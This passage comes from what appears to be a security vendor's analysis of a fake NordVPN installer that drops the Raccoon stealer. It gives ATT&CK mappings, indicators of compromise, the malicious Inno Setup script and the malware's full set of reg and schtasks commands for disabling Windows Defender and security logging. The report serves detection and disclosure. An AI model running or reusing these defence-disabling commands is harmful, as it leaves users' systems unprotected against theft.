Unicode characters to deter the process of static analysis and reverse engineering. Figure 10 below shows the code flow for binary construction, loading, and transfer of code execution. Figure 10: Decoding the bitmap to binary and transferring execution // 公jrxl的A太 wCe This is the final layer, which is responsible for loading and executing the main malware payload of the infection chain. The malware payload is stored among the resources of this final layer DLL with the resource name “ifF3K”. Like previous layers, the main malware payload is present in encrypted form. Executing further, the malware payload is decrypted, a new suspended version of the main .NET binary sihost.exe is created, and the malware payload is injected into the suspended process using the Hollow Process Injection technique. The injected malware payload is the well-known information stealer known as Raccoon stealer. Similar builds but different themes Pivoting on the package build, we found more than 500 samples (more than 50% of these samples have less than 10 detections) and two additional themes being used to deliver malware payload—one was related to multimedia applications and the other to security softwares. We have not confirmed whether the Raccoon stealer is the final payload for all the samples, but they seem similar to the current attack. Zscaler Cloud Sandbox report Figure 11: Zscaler Cloud Sandbox report In addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators at various levels. - HTML.MalURL.NordVPN - Win32.PWS.Raccoon MITRE ATT&CK TTP mapping ID Tactic Technique T1566 Phishing Attacker hosted fake websites leading to malicious file download T1204.002 User Execution: Malicious File User executes the downloaded file T1140 Deobfuscate/Decode Files or Information Strings and other data are obfuscated in the payloads T1027.002 Obfuscated Files or Information: Software Packing Payloads are packed in layers T1070.004 Indicator Removal on Host: File Deletion Deletes all the components which were used in the initialization stage T1055.012 Process Injection: Process Hollowing Use hollow process injection technique to execute the final malware payload T1562 Impair Defenses Disables Windows Defender features and log audits T1124 System Time Discovery One of Raccoon capabilities T1087 Account Discovery One of Raccoon capabilities T1124 File and Directory Discovery One of Raccoon capabilities T1057 Process Discovery One of Raccoon capabilities T1012 Query Registry One of Raccoon capabilities T1113 Screen Capture One of Raccoon capabilities T1082 System Information Discovery One of Raccoon capabilities T1016 System Network Configuration Discovery One of Raccoon capabilities T1573.001 Encrypted Channel: Symmetric Cryptography One of Raccoon capabilities Indicators of compromise Hashes MD5 Description e157f55aff49fe53befa3484d5e2b575 NordVPNsetup.exe b5d6f5e514757d7b075ed59d79b8f2e2 STRTbbbn7przuvwav4hbpbps.vbs 7924178f4a19db114e1fbb2764b8b409 AVDbbbn7i3b4ho55ck6raahj.bat b3a6b11fcf113f692648bc8f0f3f898e main.bat 228c709d87e5ff50e7d5c05b1a7f6c03 DELbbbn7l3bnchd166d2hhhv.bat b2880d44773178644ff13d755e96d5e2 file.bin 0d2acc1da9ea3c2f98bcbc3ce872beb7 Raccoon Stealer // Few other VPN packages MD5 Description 67516c2a72880e674795b0a9a1edcb36 FSecureFreedomeVPN.exe fabc80d1a8c2c580f04550c34247e24d avast_vpn_online_setup.x64.exe Malicious domains vpnnords[.]com nordsfreevpn[.]com nordsecure[.]click vpn-nord[.]net Dropped files %ProgramFiles%\NordVPNSetup.exe OR %ProgramFiles(x86)%\NordVPNSetup.exe %SystemDrive%\ProgramData\SZUCiTYO44EalgWu\7z.exe %SystemDrive%\ProgramData\SZUCiTYO44EalgWu\7z.dll %SystemDrive%\ProgramData\SZUCiTYO44EalgWu\file.bin %SystemDrive%\ProgramData\SZUCiTYO44EalgWu\main.bat %SystemDrive%\ProgramData\SZUCiTYO44EalgWu\AVDbbbn7i3b4ho55ck6raahj.bat %SystemDrive%\ProgramData\SZUCiTYO44EalgWu\DELbbbn7l3bnchd166d2hhhv.bat %SystemDrive%\ProgramData\SZUCiTYO44EalgWu\STRTbbbn7przuvwav4hbpbps.vbs %SystemDrive%\ProgramData\SZUCiTYO44EalgWu\sihost.exe Appendix // install_script.iss from fake NordVPN Inno package ;InnoSetupVersion=6.0.0 (Unicode) [Setup] AppName=SZUCiTYOSZUCiTYO IJiEalgWu AppId=SZUCiTYOSZUCiTYO IJiEalgWu AppVersion= AppPublisher=EalgWuSZUCiTYOIJi EalgWu DefaultDirName={autopf} OutputBaseFilename=NordVPNSetup Compression=lzma ; Encryption=yes ; PasswordHash=b525fbe0090152aa48b9e832d1c72bdc48e94461 ; PasswordSalt=702a76b833fdb38f Uninstallable=no DisableDirPage=yes DisableProgramGroupPage=yes WizardImageFile=embedded\WizardImage0.bmp WizardSmallImageFile=embedded\WizardSmallImage0.bmp [Files] Source: "{app}\NordVPNSetup.exe"; DestDir: "{app}"; MinVersion: 0.0,6.0; Flags: deleteafterinstall ignoreversion Source: "{sd}\ProgramData\SZUCiTYO44EalgWu\7z.exe"; DestDir: "{sd}\ProgramData\SZUCiTYO44EalgWu"; MinVersion: 0.0,6.0; Flags: ignoreversion Source: "{sd}\ProgramData\SZUCiTYO44EalgWu\7z.dll"; DestDir: "{sd}\ProgramData\SZUCiTYO44EalgWu"; MinVersion: 0.0,6.0; Flags: ignoreversion Source: "{sd}\ProgramData\SZUCiTYO44EalgWu\file.bin"; DestDir: "{sd}\ProgramData\SZUCiTYO44EalgWu"; MinVersion: 0.0,6.0; Flags: ignoreversion Source: "{sd}\ProgramData\SZUCiTYO44EalgWu\main.bat"; DestDir: "{sd}\ProgramData\SZUCiTYO44EalgWu"; MinVersion: 0.0,6.0; Flags: ignoreversion Source: "{sd}\ProgramData\SZUCiTYO44EalgWu\AVDbbbn7i3b4ho55ck6raahj.bat"; DestDir: "{sd}\ProgramData\SZUCiTYO44EalgWu"; MinVersion: 0.0,6.0; Flags: ignoreversion Source: "{sd}\ProgramData\SZUCiTYO44EalgWu\DELbbbn7l3bnchd166d2hhhv.bat"; DestDir: "{sd}\ProgramData\SZUCiTYO44EalgWu"; MinVersion: 0.0,6.0; Flags: ignoreversion Source: "{sd}\ProgramData\SZUCiTYO44EalgWu\STRTbbbn7przuvwav4hbpbps.vbs"; DestDir: "{sd}\ProgramData\SZUCiTYO44EalgWu"; MinVersion: 0.0,6.0; Flags: ignoreversion [Run] Filename: "{app}\NordVPNSetup.exe"; Description: "{cm:LaunchProgram,SZUCiTYOSZUCiTYO IJiEalgWu}"; MinVersion: 0.0,6.0; Flags: postinstall skipifsilent nowait Filename: "{sd}\ProgramData\SZUCiTYO44EalgWu\STRTbbbn7przuvwav4hbpbps.vbs"; Description: "{cm:LaunchProgram,Generator}"; MinVersion: 0.0,6.0; Flags: shellexec nowait [CustomMessages] default.NameAndVersion=%1 version %2 default.AdditionalIcons=Additional shortcuts: default.CreateDesktopIcon=Create a &desktop shortcut default.CreateQuickLaunchIcon=Create a &Quick Launch shortcut default.ProgramOnTheWeb=%1 on the Web default.UninstallProgram=Uninstall %1 default.LaunchProgram=Launch %1 default.AssocFileExtension=&Associate %1 with the %2 file extension default.AssocingFileExtension=Associating %1 with the %2 file extension... default.AutoStartProgramGroupDescription=Startup: default.AutoStartProgram=Automatically start %1 default.AddonHostProgramNotFound=%1 could not be located in the folder you selected.%n%nDo you want to continue anyway? [Languages] ; These files are stubs ; To achieve better results after recompilation, use the real language files Name: "default"; MessagesFile: "embedded\default.isl"; // Commands executed to disable system security services reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f" reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f" reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f" reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f" reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f" reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f" reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f" reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f" reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f" reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f" reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f" reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f" reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f" reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f" reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f" reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f" // Altering scheduled tasks on the machine related to security services. schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable Fri, 21 May 2021 12:44:08 -0700 Sudeep Singh